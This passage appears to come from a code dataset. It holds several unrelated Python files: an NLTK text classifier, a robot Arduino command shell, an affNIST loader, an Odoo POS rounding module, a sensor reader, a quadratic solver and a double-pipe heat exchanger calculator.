num_cap_letter(raw)['num_cap_letter']/len(raw)\n return({'rate_cap_letter':round(rate, 3)})\ndef num_explan_mark(raw):\n '''\n return number of explanation mark (not necessary using as explanation)\n input raw: str\n output: dict 'num explan mark': number of explanation mark\n '''\n count=0\n for c in raw:\n if c=='!':\n count = count+1\n return {'num_explan_mark':count}\ndef rate_explan_mark(raw):\n '''\n return rate of explanation mark (not necessary using as explanation)\n input raw: str\n output: rate of explanation mark\n '''\n rate = num_explan_mark(raw)['num_explan_mark']/len(raw)\n return({'rate_explan_mark':round(rate, 3)})\ndef num_quest_mark(raw):\n '''\n return number of question mark (not necessary using as question)\n input raw: str\n output: dict 'num quest mark' number of question mark\n '''\n count=0\n for c in raw:\n if c=='?':\n count=count+1\n return {'num_quest_mark' : count}\ndef rate_quest_mark(raw):\n '''\n return rate of question mark (not necessary using as question)\n input raw: str\n output: dict 'rate quest mark':rate of question mark\n '''\n rate = num_quest_mark(raw)['num_quest_mark']/len(raw)\n return {'rate quest mark' : round(rate, 3)}\ndef num_punc_mark(raw):\n '''\n return number of punctuation mark (not necessary using as finish setences)\n input tokened: str\n output: dict 'num punc mark': number of punctuation mark\n '''\n count=0\n for c in raw:\n if c=='.':\n count=count+1\n return {'num_ounc_mark': count}\ndef num_mark_sym(raw):\n '''\n return number of marking symbol (*, &,$,%)\n input raw: str\n output: dict 'num mark sym' :number of marking symbol mark\n '''\n count=0\n for c in raw:\n if c in {'*','&','$','%'}:\n count=count+1\n return {'num_mark_sym': count}\ndef num_smile(tokened):\n '''\n Count the number of emoji (can not count the case hoang:) or :))))\n input: tokened: list\n output:dict 'num smile': number of smile\n '''\n count= 0\n for w in bigrams(tokened):\n if w== (':',')'):\n count=count+1\n return {'num_smile':count}\ndef rate_lower(raw):\n '''\n Count the rate of lowercase character\n input raw: str\n output: dict 'rate lower': rate of lowercase letter\n '''\n l = [w for w in raw if w.islower()]\n rate = len(l)/len(raw)\n return({'rate_lower': round(rate, 3)})\n\n#classify data using NaiveBayes\nfeature_vector = [negative_features(sent) for (sent,tag) in train_data]\nfor label in labels:\n\tfeaturesets = []\n\tfor i in range(len(train_data)):\n\t\tfeaturesets.append((feature_vector[i], train_data[i][1][label]))\n\tsize = int(0.1*len(featuresets))\n\ttrain_set, test_set = featuresets[size:], featuresets[:size]\n\tclassifier = nltk.NaiveBayesClassifier.train(train_set)\n\n\terrorPP, errorPN, errorNP, errorNN = 0, 0, 0, 0\n\tfor (feature, tag) in test_set:\n\t\tpredict = classifier.classify(feature)\n\t\tif predict == tag:\n\t\t\tif tag == 1:\n\t\t\t\terrorPP += 1\n\t\t\telse:\n\t\t\t\terrorNN += 1\n\t\telse:\n\t\t\tif tag == 1:\n\t\t\t\terrorNP += 1\n\t\t\telse:\n\t\t\t\terrorPN += 1\n\tprecision = round(errorPP/(errorPP + errorPN),4)\n\trecall = round(errorNN/(errorNN + errorNP),4)\n\n\tprint(\"Label {}: Accuracy = {} Precision = {} Recall = {}\".format(label, nltk.classify.accuracy(classifier, test_set), precision, recall))\n\t#classifier.show_most_informative_features(20)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"460273520","text":"#!/usr/bin/env python3\n\nimport os\nimport 
types\nimport logging\nimport importlib\n\ntry:\n from cmd2 import Cmd # , options, make_option\nexcept ImportError as err:\n print(\"Maybe you should pip3 install cmd2 (the better cmd class)\")\n\nfrom rip.head.spine.core import get_spine\n\nrc_dict = {}\n\n# RipCom-specific things.\ncurrent_search_path = os.path.dirname(os.path.realpath(__file__)) + \"/appendages\"\ncurrent_import_path = \"appendages\"\nfile_list = []\nfor f in os.listdir(current_search_path):\n if os.path.isfile(current_search_path + \"/\" + f) and f[-3:] == \".py\" and not f == \"__init__.py\" and not f == \"units.py\":\n file_list.append(f)\nfor f in file_list:\n module = importlib.import_module(\"{0:s}.{1:s}\".format(current_import_path, f[:-3]))\n class_name = f[:-3].replace('_', ' ').title().replace(' ', '')\n rc_dict[class_name] = getattr(module, class_name)\n\n# Points to the current robot's code.\nCURRENT_ARDUINO_CODE_DIR = \"/Robot/CurrentArduinoCode\"\n\n\nclass rip_com(Cmd):\n intro = \"Welcome to RipCom. Type help or ? for commands.\\nCtrl-D to exit.\"\n prompt = \"[RC]> \"\n doc_header = \"Documentation available for:\"\n undoc_header = \"Not documented:\"\n gs = None\n s = None\n appendages = None\n device = None\n\n def __init__(self):\n super().__init__()\n self.refreshDevices()\n\n def refreshDevices(self):\n self.registeredDevices = [d for d in os.listdir(CURRENT_ARDUINO_CODE_DIR)\n if os.path.isdir(\"{0:s}/{1:s}\".format(CURRENT_ARDUINO_CODE_DIR, d)) and\n not d == \".git\" and os.path.exists(\"{0:s}/{1:s}/{1:s}.json\"\n .format(CURRENT_ARDUINO_CODE_DIR, d))]\n if len(self.registeredDevices) != 0:\n self.registeredDevices.sort()\n\n self.connectedDevices = [d for d in self.registeredDevices\n if os.path.exists(\"/dev/{0:s}\".format(d))]\n if len(self.connectedDevices) != 0:\n self.connectedDevices.sort()\n\n self.lockedDevices = [d for d in self.connectedDevices\n if os.path.exists(\"/var/lock/{0:s}.lck\".format(d))]\n if len(self.lockedDevices) != 0:\n self.lockedDevices.sort()\n\n def do_connect(self, parseResults):\n self.refreshDevices()\n\n args = parseResults.parsed[1].split()\n if len(args) != 1:\n self.help_connect()\n return\n arduinoName = args[0]\n\n if arduinoName not in self.connectedDevices:\n print(\"Arduino \\\"{}\\\" is not available.\".format(arduinoName))\n return\n\n self.gs = get_spine(devices=[arduinoName])\n self.s = self.gs.__enter__()\n self.appendages = self.s.get_appendage_dict()\n\n def registerMethods(RCClass):\n self.__dict__[\"do_\" + name] = types.MethodType(RCClass.interact, self)\n self.__dict__[\"help_\" + name] = types.MethodType(RCClass.help, self)\n self.__dict__[\"complete_\" + name] = types.MethodType(RCClass.complete, self)\n\n for name, appendage in self.appendages.items():\n if appendage.__class__.__name__ in rc_dict:\n registerMethods(rc_dict[appendage.__class__.__name__])\n else:\n print(\"{0:s} not found among RC imports\".format(appendage.label))\n\n self.device = arduinoName\n\n def help_connect(self):\n print(\"usage: connect \")\n print(\"Normally, ArduinoName could be something as simple as 'mega'\")\n\n def complete_connect(self, text, line, begidx, endidx):\n return [i for i in self.connectedDevices if i.startswith(text)]\n\n def do_disconnect(self, parseResults):\n if self.appendages is not None:\n for name in self.appendages:\n del self.__dict__[\"do_\" + name]\n del self.__dict__[\"help_\" + name]\n del self.__dict__[\"complete_\" + name]\n self.appendages = None\n\n self.gs.__exit__(None, None, None)\n self.s = None\n self.gs = None\n\n def 
help_disconnect(self):\n print(\"usage: disconnect\")\n print(\"Disconnects from a connected arduino.\")\n\n def do_list(self, parseResults):\n self.refreshDevices()\n self.print_topics(\"Connected Devices\", self.connectedDevices, 15, 80)\n self.print_topics(\"Locked Devices\", self.lockedDevices, 15, 80)\n do_li = do_list\n do_l = do_list\n\n def help_list(self):\n print(\"Lists the currently connected arduinos\")\n\n def do_rmlock(self, parseResults):\n self.refreshDevices()\n arduinoName = parseResults.parsed[1]\n\n if arduinoName != \"\":\n if arduinoName == self.device:\n print(\"You are currently connected to {0:s}, lockfile not removed.\".format(arduinoName))\n elif arduinoName in self.lockedDevices:\n try:\n os.remove(\"/var/lock/{0:s}.lck\".format(arduinoName))\n print(\"Removed the {0:s} lockfile.\".format(arduinoName))\n except PermissionError:\n print(\"You don't have permission to remove the {0:s} lockfile.\".format(arduinoName))\n elif arduinoName in self.connectedDevices:\n print(\"{0:s} is not locked.\".format(arduinoName))\n elif arduinoName in self.registeredDevices:\n print(\"{0:s} is not connected.\".format(arduinoName))\n else:\n print(\"{0:s} is not registered.\".format(arduinoName))\n else:\n for arduinoName in self.lockedDevices:\n if arduinoName == self.device:\n print(\"You are currently connected to {0:s}, lockfile not removed.\".format(arduinoName))\n else:\n try:\n os.remove(\"/var/lock/{0:s}.lck\".format(arduinoName))\n print(\"Removed the {0:s} lockfile.\".format(arduinoName))\n except PermissionError:\n print(\"You don't have permission to remove the {0:s} lockfile.\".format(arduinoName))\n\n def help_rmlock(self):\n print(\"Removes lockfiles for connected devices.\")\n print(\"If no device name is specified, removes all lockfiles.\\n\")\n print(\"usage: rmlock\")\n print(\" rmlock \")\n\n def complete_rmlock(self, text, line, begidx, endidx):\n return [i for i in self.lockedDevices if i.startswith(text)]\n\n def do_exit(self, parseResults):\n self.do_disconnect(None)\n return True\n\n def help_exit(self):\n print(\"Disconnects from any connected arduinos, and exits ArduinoCom.\")\n\n def do_quit(self, parseResults):\n return self.do_exit(parseResults)\n\n def help_quit(self):\n print(\"Alias for exit\")\n\n def do_EOF(self, parseResults):\n print()\n return self.do_exit(parseResults)\n do_eof = do_EOF\n\n def help_help(self):\n print(\"Prints help for commands\")\n\n def get_names(self):\n names = dir(self)\n names.remove(\"do_EOF\")\n names.remove(\"do_eof\")\n names.remove(\"do_q\")\n return names\n\n\n# Initializes the command interface loop on the terminal.\n# Uses __main__ detection so that this file can be used as an import from other pys.\nif __name__ == '__main__':\n rc = rip_com()\n rc.debug = True\n rc.case_insensitive = True\n logging.disable(logging.INFO)\n rc.cmdloop()\n","sub_path":"rip_com.py","file_name":"rip_com.py","file_ext":"py","file_size_in_byte":7488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"629699453","text":"__author__ = 'yizhangzc'\n\n# course: CV\n# teacher: DongHui Wang\n# author: zju_cs / Yi Zhang / 21721190\n# mail: yizhangzc@gmail.com\n# data: 2018/5\n# environment: ubuntu 14.04 / python 3.5 / numpy 1.14 / tensorflow 1.2 / CUDA 8.0\n\nimport numpy as np\n\nimport scipy.io as sio\n\nclass DatasetConfig( object ):\n\n def __init__( self ):\n self._dataset_path = \"/data/zy/course/cv/\"\n self._class_num = 10\n self._row = 40\n self._column = 40\n\nclass AffNIST( 
object ):\n\n cfg = DatasetConfig()\n\n def __init__( self ):\n \n self.cfg._dataset_path = \"/data/zy/course/cv/\"\n self.cfg._class_num = 10\n self.cfg._row = 40\n self.cfg._column = 40\n\n def load_data( self ):\n\n print( \"loading data...\" )\n\n train_data_path = self.cfg._dataset_path + \"training_and_validation_batches/\"\n test_data_path = self.cfg._dataset_path\n\n train_x = np.empty( [ 0, 1600 ], dtype = np.float32 )\n train_y = np.empty( [ 0 ], dtype = np.int32 )\n\n for i in range( 32 ):\n\n data = sio.loadmat( train_data_path + \"{}.mat\".format( i + 1 ) )\n train_x = np.vstack( ( train_x, np.transpose( data[\"affNISTdata\"][0][0][2] )[0: 200] ) )\n train_y = np.concatenate( [ train_y, data[\"affNISTdata\"][0][0][5][0][0: 200] ] )\n print( \"{}.mat finished!\".format( i + 1 ) )\n\n\n test_data = sio.loadmat( test_data_path + \"test.mat\" )\n print( \"test.mat finished!\" )\n\n\n test_x = np.transpose( test_data[\"affNISTdata\"][0][0][2] )[0: 200]\n test_y = test_data[\"affNISTdata\"][0][0][5][0][0: 200]\n\n test_x.astype( np.float32 )\n test_y.astype( np.int32 )\n\n train_x = np.true_divide( train_x, 255. )\n test_x = np.true_divide( test_x, 255. )\n\n print( \"train_x shape:{} type:{}\\n\".format( train_x.shape, train_x.dtype ) + \\\n \"train_y shape:{} type:{}\\n\".format( train_y.shape, train_y.dtype ) + \\\n \"test_x shape:{} type:{}\\n\".format( test_x.shape, test_x.dtype ) + \\\n \"test_y shape:{} type:{}\".format( test_y.shape, test_y.dtype ) )\n \n print( \"data loaded!\" )\n\n return train_x, train_y, test_x, test_y","sub_path":"classification/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"92300990","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom openerp.osv import osv, fields\r\nimport math\r\n\r\nclass pos_order_line(osv.osv):\r\n _name='pos.order.line' \r\n _inherit='pos.order.line'\r\n def _amount_line_all(self, cr, uid, ids, field_names, arg, context=None):\r\n\r\n user = self.pool.get('res.users').browse(cr, uid, uid)\r\n company = user.company_id\r\n factor = int(100 / company.wf_rounding_pos)\r\n\r\n res = dict([(i, {}) for i in ids])\r\n account_tax_obj = self.pool.get('account.tax')\r\n cur_obj = self.pool.get('res.currency')\r\n for line in self.browse(cr, uid, ids, context=context):\r\n taxes = line.product_id.taxes_id\r\n price = line.price_unit * (1 - (line.discount or 0.0) / 100.0)\r\n\r\n taxes = account_tax_obj.compute_all(cr, uid, line.product_id.taxes_id, price, line.qty, product=line.product_id, partner=line.order_id.partner_id or False)\r\n\r\n if company.wf_rounding_policy == 'even':\r\n rounded_amount = round(taxes['total_included'] * factor) / factor\r\n elif company.wf_rounding_policy == 'up':\r\n rounded_amount = (math.ceil(taxes['total_included'] * factor)) / factor\r\n elif company.wf_rounding_policy == 'down':\r\n rounded_amount = math.floor(taxes['total_included'] * factor) / factor\r\n taxes = account_tax_obj.compute_all(cr, uid, line.product_id.taxes_id, rounded_amount, 1, product=line.product_id, partner=line.order_id.partner_id or False)\r\n \r\n cur = line.order_id.pricelist_id.currency_id\r\n res[line.id]['price_subtotal'] = cur_obj.round(cr, uid, cur, taxes['total'])\r\n res[line.id]['price_subtotal_incl'] = cur_obj.round(cr, uid, cur, taxes['total_included'])\r\n return res\r\n\r\n def onchange_qty(self, cr, uid, ids, product, discount, qty, price_unit, context=None):\r\n\r\n #bsbs 3 Zeilen dazu\r\n user = 
self.pool.get('res.users').browse(cr, uid, uid)\r\n company = user.company_id\r\n factor = int(100 / company.wf_rounding_pos)\r\n\r\n result = {}\r\n if not product:\r\n return result\r\n account_tax_obj = self.pool.get('account.tax')\r\n cur_obj = self.pool.get('res.currency')\r\n\r\n prod = self.pool.get('product.product').browse(cr, uid, product, context=context)\r\n\t #bsbs anfang\r\n taxes = prod.taxes_id\r\n price = price_unit * (1 - (discount or 0.0) / 100.0)\r\n taxes = account_tax_obj.compute_all(cr, uid, prod.taxes_id, price, qty, product=prod, partner=False)\r\n\r\n if company.wf_rounding_policy == 'even':\r\n rounded_amount = round(taxes['total_included'] * factor) / factor\r\n elif company.wf_rounding_policy == 'up':\r\n rounded_amount = (math.ceil(taxes['total_included'] * factor)) / factor\r\n elif company.wf_rounding_policy == 'down':\r\n rounded_amount = math.floor(taxes['total_included'] * factor) / factor\r\n taxes = account_tax_obj.compute_all(cr, uid, prod.taxes_id, rounded_amount, 1, product=prod, partner=False)\r\n\t #bsbs ende\r\n\r\n result['price_subtotal'] = taxes['total']\r\n result['price_subtotal_incl'] = taxes['total_included']\r\n return {'value': result}\r\n\r\n\r\n _columns = {\r\n 'price_subtotal': fields.function(_amount_line_all, multi='pos_order_line_amount', string='Subtotal w/o Tax', store=True),\r\n 'price_subtotal_incl': fields.function(_amount_line_all, multi='pos_order_line_amount', string='Subtotal', store=True),\r\n }\r\n\r\npos_order_line()","sub_path":"wf_round_POS/wf_round.py","file_name":"wf_round.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"456851810","text":"from hwt.hdlObjects.types.hdlType import HdlType \nfrom hwt.hdlObjects.value import Value\nfrom hwt.hdlObjects.types.boolean import Boolean\nfrom hwt.hdlObjects.types.bits import Bits\nfrom hwt.hdlObjects.types.defs import INT\nfrom hwt.hdlObjects.operator import Operator\nfrom hwt.hdlObjects.operatorDefs import AllOps\nfrom hwt.bitmask import mask\n\ndef convertBits__val(self, sigOrVal, toType):\n if isinstance(toType, Boolean):\n return sigOrVal._eq(self.getValueCls().fromPy(1, self))\n elif isinstance(toType, Bits):\n if self.bit_length() == toType.bit_length():\n return sigOrVal._convSign(toType.signed)\n elif toType == INT:\n if self.signed:\n raise NotImplementedError()\n else:\n fullMask = mask(self.bit_length())\n return INT.getValueCls()(sigOrVal.val, INT, sigOrVal.vldMask == fullMask, sigOrVal.updateTime)\n return HdlType.defaultConvert(self, sigOrVal, toType)\n\n\ndef convertBits(self, sigOrVal, toType):\n isVal = isinstance(sigOrVal, Value)\n \n if isinstance(toType, Boolean):\n if isVal:\n return sigOrVal._eq(self.getValueCls().fromPy(1, self))\n elif self.bit_length() == 1:\n v = 0 if sigOrVal.negated else 1\n return sigOrVal._eq(self.getValueCls().fromPy(v, self))\n elif isinstance(toType, Bits):\n if self.bit_length() == toType.bit_length():\n return sigOrVal._convSign(toType.signed)\n elif toType == INT:\n if isVal:\n if self.signed:\n raise NotImplementedError()\n else:\n fullMask = mask(self.bit_length())\n return INT.getValueCls()(sigOrVal.val, INT, sigOrVal.vldMask == fullMask, sigOrVal.updateTime)\n else:\n return Operator.withRes(AllOps.BitsToInt, [sigOrVal], toType)\n\n return HdlType.defaultConvert(self, sigOrVal, 
toType)\n","sub_path":"hwt/hdlObjects/types/bitsConversions.py","file_name":"bitsConversions.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"76072426","text":"#!/usr/bin/env python\n#\nimport grovepi\nimport math\n\n# Connexion du capteur humidite temperature sur le port D4\nsensor = 4\n\n# temp_humidity_sensor_type\n# Utilisation du capteur \"bleu\"\nblue = 0 \nwhite = 1\n\n\ntry:\n [temp,humidity] = grovepi.dht(sensor,blue) \n if math.isnan(temp) == False and math.isnan(humidity) == False:\n print(\"temperature = %.02f C hygrométrie =%.02f%%\"%(temp, humidity))\n\nexcept IOError:\n print (\"Error\")\n","sub_path":"raspberry/lecture_humidite_temperature.py","file_name":"lecture_humidite_temperature.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"649709678","text":"#File: rootsPeters.py \n#Project: CSIS2101 \n#Author: Joshua Peters \n#History: Version 1.0 September 25, 2020\n\n# This program's function is to find two roots of a quadratic equation.\n# Quadratic equation: ax^2 + bx + c = 0\n# Quadratic formula: (-b +/- sqrt(b^2 - 4ac)/2a\n\nimport math\n\ndef main():\n# assigns user input as variables\n a,b,c = eval(input(\"Type in the a, b, & c value for your equation \\\nseparated by commas: \"))\n\n# calls the calculation of the discriminate\n disc = calcDisc(a,b,c)\n\n# calculates and displays the roots or not\n if validateDisc(disc) == True:\n root1 = (-b + math.sqrt(disc)) / (2*a)\n root2 = (-b - math.sqrt(disc)) / (2*a)\n print(\"The roots of the equation:\", root1, root2)\n else:\n print(\"The square root of a negative number cannot be determinded.\")\n\n# calculates the discriminate\ndef calcDisc(a,b,c):\n disc = b**2 - 4*a*c\n return disc\n\n# makes sure the equation is solvable\ndef validateDisc(disc):\n if disc < 0:\n return False;\n else:\n return True;\n","sub_path":"rootsPeters.py","file_name":"rootsPeters.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"602505116","text":"# -*- coding: utf-8 -*-\r\n# Módulo de Equações para Trocadores de Calor Duplo-Tubo\r\n# Última alteração: 19:32 18/09/2016\r\n\r\nfrom math import *\r\nfrom dupl_tubo import *\r\n\r\nfluido1={'Vazao':0,'T_entr':0,'T_said':0,'cp':0,'k':0,'Pr':0,'Viscos':0,\r\n 'Densidade':0,'Diam_ext':0,'Diam_int':0,'Annulus':0,'Liquido':0,'Viscos_tw':0}\r\nfluido2={'Vazao':0,'T_entr':0,'T_said':0,'cp':0,'k':0,'Pr':0,'Viscos':0,\r\n 'Densidade':0,'Diam_ext':0,'Diam_int':0,'Annulus':1,'Liquido':0,'Viscos_tw':0}\r\nmaterial={'K':0,'L':1, 'R_fi':0,'R_fo':0,'Calor_cnste':0,'Contracorrente':0,\r\n 'Num_tubs':0,'Alet_per_tube':0,'Alet_alt':0,'Alet_K':0,'Alet_espes':0,\r\n 'Alet_type':0,'Tubo_aletado':0,'Multi_tube':0}\r\n\r\n########################### LEMBRAR DE: ############################################\r\n# 1º Corrigir Banco de Dados\r\n# 2º \r\n# 3º \r\n# 4º \r\n####################################################################################\r\n\r\n\r\ndef yut(fluido1,fluido2,material):\r\n if not all([fluido1['Vazao'],fluido2['Vazao'],fluido1['T_entr'],\r\n fluido1['T_said'],fluido2['T_entr'],fluido2['T_said']]):\r\n calor_vazao(fluido1,fluido2) # Add in the commments section!\r\n if material['arranj_ser_paral']==True:\r\n if material['T_I_Paralelo']:\r\n fluido1['Vazao']=fluido1['Vazao']/material['Num_ramos']\r\n elif 
material['R_A_Paralelo']:\r\n fluido2['Vazao']=fluido2['Vazao']/material['Num_ramos']\r\n reynolds_tube(fluido1,fluido2,material)\r\n nusselt_tube(fluido1,fluido2,material)\r\n nusselt_tube(fluido2,fluido1,material)\r\n dTm=check_dtm(fluido1,fluido2,material) \r\n h_i=fluido1['Nu']*fluido1['k']/fluido1['Diam_int']\r\n if material['Tubo_aletado']==True:\r\n d_h,h_o,U_d,U_c,A_tot=alets(fluido1,fluido2,material)\r\n else:\r\n # Annulus - UNfinned\r\n h_o=fluido2['Nu']*fluido2['k']/((fluido2['Diam_int']**2-fluido1['Diam_ext']**2)/fluido1['Diam_ext'])\r\n U_d=(fluido1['Diam_ext']/(fluido1['Diam_int']*h_i)+(fluido1['Diam_ext']*material['R_fi'])/fluido1['Diam_int']+(fluido1['Diam_ext']*log(fluido1['Diam_ext']/fluido1['Diam_int']))/(2*material['K'])+material['R_fo']+(1/h_o))**-1\r\n U_c=((fluido1['Diam_ext']/(fluido1['Diam_int']*h_i))+(fluido1['Diam_ext']*log(fluido1['Diam_ext']/fluido1['Diam_int'])/(2*material['K']))+(h_o**-1))**-1\r\n q=fluido1['Vazao']*fluido1['cp']*abs(fluido1['T_entr']-fluido1['T_said'])\r\n if material['arranj_ser_paral']==True:\r\n F_p=dupl_fact_ser_paral(material)\r\n area=q/(U_d*F_p*dTm)\r\n else:\r\n area=(q)/(U_d*dTm);\r\n area_grampo=A_tot if material['Tubo_aletado']==True else 2*pi*fluido1['Diam_ext']*material['L']\r\n if material['arranj_ser_paral']==True:\r\n x=int(area/area_grampo);n=material['Num_ramos'];\r\n num_grampo=(x//n)*n+n\r\n else:\r\n num_grampo=int(area/area_grampo) if area/area_grampo==int(area/area_grampo) else int(area/area_grampo)+1 \r\n material['Num_gramp']=num_grampo\r\n Pressure_drop_serth(fluido1,material)\r\n if material['Tubo_aletado']==True:\r\n Pressure_drop_serth(fluido2,material,diam_h=d_h)\r\n else: \r\n Pressure_drop_serth(fluido2,material,diam_h=fluido2['Diam_int']-fluido1['Diam_ext'])\r\n fluido1['Potencia_bomb']=fluido1['Vazao']*fluido1[u'\\u0394Ptotal']/(material['Efic_bomb1']*fluido1['Densidade'])\r\n fluido2['Potencia_bomb']=fluido2['Vazao']*fluido2[u'\\u0394Ptotal']/(material['Efic_bomb2']*fluido2['Densidade'])\r\n CF=U_d/U_c;OS=100*U_c*(1-CF)/(U_c*CF)\r\n result_fl={'Vazão':(str(fluido1['Vazao'])+' Kg/s',str(fluido2['Vazao'])+' Kg/s'),\r\n 'Temperatura de Entrada':(str(fluido1['T_entr'])+u' ºC',str(fluido2['T_entr'])+u' ºC'),\r\n 'Temperatura de Saída':(str(fluido1['T_said'])+u' ºC',str(fluido2['T_said'])+u' ºC'),\r\n 'Velocidade Média de Escoamento':(str(fluido1['Vel_m'])+u' m/s',str(fluido2['Vel_m'])+u' m/s'),\r\n 'Número de Reynolds':(str(fluido1['Re'])+u' ',str(fluido2['Re'])+u' '),\r\n 'Número de Nusselts':(str(fluido1['Nu'])+u' ',str(fluido2['Nu'])+u' '),\r\n 'Coeficiente de Película (h)':(str(h_i)+u' W/m2.K',str(h_o)+u' W/m2.K')};\r\n result_pres={u'\\u2206P':(str(fluido1[u'\\u0394P'])+u' Pa',str(fluido2[u'\\u0394P'])+u' Pa'),\r\n '\\u2206Prb':(str(material[u'\\u0394Pr1'])+u' Pa',str(material[u'\\u0394Pr2'])+u' Pa'),\r\n '\\u2206Ptotal':(str(fluido1[u'\\u0394Ptotal'])+u' Pa',str(fluido2[u'\\u0394Ptotal'])+u' Pa'),\r\n 'Potência de Bombeamento':(str(fluido1['Potencia_bomb'])+u' W',str(fluido2['Potencia_bomb'])+u' W'),\r\n '\\u2206Pnl (bocais)':(str('---')+u' Pa',str(material[u'\\u0394Pn'])+u' Pa')}\r\n result_geral={'Área de Troca Térmica Total':(str(area)+u' m2'),\r\n 'Calor Trocado (Heat Duty)':(str(q)+u' J'),\r\n 'Coef. de Trans. de Calor Limpo (Uc)':(str(U_c)+u' W/m2.K'),\r\n 'Coef. de Trans. de Calor Incrustado (Ud)':(str(U_d)+u' W/m2.K'),\r\n 'Fator de Limpeza (CF)':(str(CF)+u' '),\r\n 'Var. Log. 
de Temperatura (\\u2206Tm)':(str(dTm)+u' K'),\r\n 'Área por Grampo Tubular':(str(area_grampo)+' m2'),\r\n 'Número de Grampos':(str(num_grampo)+' grampo(s)'),\r\n 'Excesso de Área (Over-Surface Design)':(str(OS)+u'%')}\r\n return result_fl,result_pres,result_geral\r\n\r\n\r\n# Exemplo 6.1 Kakaç e Liu (2002)\r\n'''\r\nfluido1={'Vazao':0,'T_entr':140,'T_said':125,'cp':4268,'k':0.687,'Pr':1.28,'Viscos':0.207*10**-3,'Densidade':932.53,'Diam_ext':0.0603,'Diam_int':0.0525,'Annulus':0,'Liquido':1,'Viscos_tw':0.196*10**-3};fluido2={'Vazao':5000/3600.,'T_entr':20,'T_said':35,'cp':4179,'k':0.609,'Pr':5.77,'Viscos':0.841*10**-3,'Densidade':996.4,'Diam_ext':0,'Diam_int':0.0779,'Annulus':1,'Liquido':1,'Viscos_tw':0.719*10**-3};material={'K':54,'L':3.5, 'R_fi':0.000176,'R_fo':0.000352,'Calor_cnste':1,'Contracorrente':1,'Efic_bomb1':0.8,'Efic_bomb2':0.8,'Num_tubs':0,'Alet_per_tube':0,'Alet_alt':0,'Alet_K':0,'Alet_espes':0,'Alet_type':0,'Tubos_Aletado':0}\r\n'''\r\n\r\n# Exemplo 6.3 STT Sample\r\n\"\"\"\r\nfluido1={'Pr':16.16959743921541,'Annulus':0,'T_entr':148.8889,'T_said':154.444,'cp':2473.926, 'Liquido':1,'Diam_int':0.052502,'Vazao':4.56741944,'Viscos':8.247780588*10**-4,'Diam_ext':0.060452,'k':0.1261899,'Densidade':758.8635647561536,'Viscos_tw':0};fluido2={'Pr':67.12089254763255,'Annulus':1,'T_entr':232.2222,'T_said':176.6667,'cp':2595.32, 'Liquido':1,'Diam_int':0.077927,'Vazao':0.869384666666,'Viscos':0.00299942964836582,'Diam_ext':0.0889,'k':0.115977,'Densidade':770.8837447469,'Viscos_tw':0};material={'K': 54, 'L': 6.096, 'Calor_cnste': 1, 'R_fi':0.0056869019274806264 , 'R_fo': 0.0056869019274806264, 'Contracorrente': 1,'Efic_bomb1':0.8,'Efic_bomb2':0.8,'Num_tubs':0,'Alet_per_tube':0,'Alet_alt':0,'Alet_K':0,'Alet_espes':0,'Alet_type':0,'Tubos_Aletado':0}\r\n\"\"\"\r\n\r\n# Exemplo 6.1 Kern\r\n\"\"\"\r\nfluido1={'Pr': 1735.2*(541.23*10**-6)/(140.1072*10**-3), 'Annulus': 0, 'T_entr': 26.6, 'T_said': 48.8, 'cp': 1735.2, 'Liquido': 1, 'Diam_int': 35.052*10**-3, 'Vazao': 1.2372, 'Viscos': 541.23*10**-6, 'Diam_ext': 42.164*10**-3, 'k': 140.1072*10**-3, 'Densidade': 860.111, 'Viscos_tw': 0};fluido2={'Pr':1768.3*(575.7156*10**-6)/(121.154*10**-3) , 'Annulus': 1, 'T_entr': 71.1, 'T_said': 37.8, 'cp': 1768.3, 'Liquido': 1, 'Diam_int': 52.5018*10**-3, 'Vazao': 0.0, 'Viscos': 575.7156*10**-6, 'Diam_ext': 60.452*10**-3, 'k': 121.154*10**-3, 'Densidade': 834.356, 'Viscos_tw': 0};material={'K': 54, 'L': 6.096, 'Calor_cnste': 1, 'R_fi':0.0002 , 'R_fo': 0.0002, 'Contracorrente': 1,'Efic_bomb1':0.8,'Efic_bomb2':0.8,'Num_tubs':0,'Alet_per_tube':0,'Alet_alt':0,'Alet_K':0,'Alet_espes':0,'Alet_type':0,'Tubos_Aletado':0}\r\n\"\"\"\r\n\r\n# Exemplo Serth 4.1 pg 116\r\n\"\"\"\r\nfluido1={'Vazao':1.26,'T_entr':15.5556,'T_said':48.889,'cp':1758.456,'k':0.1594452,'Pr':6.06572,'Viscos':0.55*10**-3,'Densidade':879.0,'Diam_ext':0.0603, 'Diam_int':0.0525,'Annulus':0, 'Liquido':1,'Viscos_tw':0.33*10**-3};fluido2={'Vazao':0,'T_entr':65.5556,'T_said':37.7778,'cp':2177.136,'k':0.1731,'Pr':25.15466,'Viscos':2*10**-3,'Densidade':1022.0,'Diam_ext':0,'Diam_int':0.0779,'Annulus':1,'Liquido':1,'Viscos_tw':1.55*10**-3};material={'K':16.2714,'L':4.8768, 'R_fi':0.000176,'R_fo':0.000352, 'Calor_cnste':1,'Contracorrente':1,'Efic_bomb1':0.8,'Efic_bomb2':0.8,'Num_tubs':0,'Alet_per_tube':0,'Alet_alt':0,'Alet_K':0,'Alet_espes':0,'Alet_type':0,'Tubos_Aletado':0}\r\n\"\"\"\r\n\r\n# Exemplo 6.2 Kakaç e Liu pg 
